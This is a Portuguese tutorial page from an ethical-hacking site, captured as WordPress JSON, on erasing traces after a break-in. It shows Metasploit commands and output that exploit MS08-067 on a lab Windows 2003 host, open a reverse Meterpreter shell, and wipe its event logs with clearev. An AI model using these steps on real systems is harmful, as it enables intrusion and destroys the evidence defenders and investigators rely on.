{"id":5747,"date":"2013-02-08T11:51:01","date_gmt":"2013-02-08T14:51:01","guid":{"rendered":"http:\/\/www.ethicalhacker.com.br\/site\/?page_id=5747"},"modified":"2023-01-31T19:39:45","modified_gmt":"2023-01-31T22:39:45","slug":"apagando-rastros","status":"publish","type":"page","link":"https:\/\/www.ethicalhacker.com.br\/site\/apagando-rastros\/","title":{"rendered":"Apagando Rastros"},"content":{"rendered":"<p>Depois do ataque, a primeira tarefa do invasor ser\u00e1 apagar LOGs. \u00c9 claro que existem diversas maneiras de exclus\u00e3o, principalmente se o sistema operacional for UNIX, pois processos n\u00e3o impedir\u00e3o a exclus\u00e3o de arquivos como no Windows, ou seja, bastar\u00e1 ter poder de root e nada que um toque da morte possa resolver.<\/p>\n<p>A seguir, utilizarei o metasploit para exclus\u00e3o de LOGs de uma m\u00e1quina Windows.<\/p>\n<p>1\u00ba) Primeiramente vamos comprometer o alvo<\/p>\n<pre prompt=\"#\" lang=\"shell\">msf &gt; use windows\/smb\/ms08_67_netapi\nmsf exploit (ms08_067_netapi) &gt; set LHOST 192.168.42.150\nLHOST =&gt; 192.168.42.150\nmsf exploit (ms08_067_netapi) &gt; set RHOST 192.168.42.254\nRHOST =&gt; 192.168.42.254\nmsf exploit (ms08_067_netapi) &gt; set PAYLOAD windows\/meterpreter\/reverse_tcp\npayload =&gt; windows\/meterpreter\/reverse_tcp\nmsf exploit (ms08_067_netapi) &gt; exploit\n[*] Started reverse handler on 192.168.42.150:4444\n[*] Automatically detecting the target \u2026\n[*] Fingerprint: Windows 2003 \u2013 No Service Pack \u2013 lang:Unknown\n[*] Selected Target: Windows 2003 SP0 Universal\n[*] Attempting to trigger the vulnerability \u2026\n[*] Sending stage (749056 bytes) to 192.168.42.254\n[*] Meterpreter session 1 opened (192.168.42.150:4444 -&gt; 192.168.42.254:1031) at 2012-05-22 15:37:35 -0300\n\n<\/pre>\n<p>2\u00ba)Passo:  Agora colocamos o meterpreter em a\u00e7\u00e3o, utilizamos o clearev:<\/p>\n<pre prompt=\"#\" lang=\"shell\">meterpreter &gt; clearev\n[*] Wiping 200 records from Application\u2026\n[*] Wiping 300 records from System\u2026\n[*] Wiping 90 records from Security\u2026\n\n<\/pre>\n<p>Ai est\u00e1, simples !!! 200 registros aplica\u00e7\u00e3o + 300 de sistemas + 90 de seguran\u00e7a apagados.<\/p>\n<p>E isso ai !!!!<\/p>\n\r\n\t\t<div class='author-shortcodes'>\r\n\t\t\t<div class='author-inner'>\r\n\t\t\t\t<div class='author-image'>\r\n\t\t\t<img src='https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/186048_100001838322519_1550894_n-11668_57x57.jpg' alt='' \/>\r\n\t\t\t<div class='author-overlay'><\/div>\r\n\t\t<\/div> <!-- .author-image --> \r\n\t\t<div class='author-info'>\r\n\t\t\t<p>Autor:&nbsp;<strong>S\u00edlvio C\u00e9sar Roxo Giavaroto<\/strong><\/p>\n<p>\u00c9 MBA Especialista em Gest\u00e3o de Seguran\u00e7a da Informa\u00e7\u00e3o,\nTecn\u00f3logo em Redes de Computadores, C|EH Certified Ethical Hacker,\natua como Pentest e Analista de Seguran\u00e7a em Servidores Linux no\nGoverno do Estado de S\u00e3o Paulo, Professor Universit\u00e1rio , &nbsp;Instrutor\nC|EH e C|HFI.<\/p>\n<p><em>&nbsp;<\/em>\r\n\t\t<\/div> <!-- .author-info --><\/p>\r\n\t\t\t<\/div> <!-- .author-inner -->\r\n\t\t<\/div> <!-- .author-shortcodes -->\n","protected":false},"excerpt":{"rendered":"<p>Depois do ataque, a primeira tarefa do invasor ser\u00e1 apagar LOGs. \u00c9 claro que existem diversas maneiras de exclus\u00e3o, principalmente se o sistema operacional for UNIX, pois processos n\u00e3o impedir\u00e3o a exclus\u00e3o de arquivos como no Windows, ou seja, bastar\u00e1 ter poder de root e nada que um toque da morte possa resolver. A seguir, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-5747","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/pages\/5747","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/comments?post=5747"}],"version-history":[{"count":4,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/pages\/5747\/revisions"}],"predecessor-version":[{"id":19754,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/pages\/5747\/revisions\/19754"}],"wp:attachment":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media?parent=5747"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}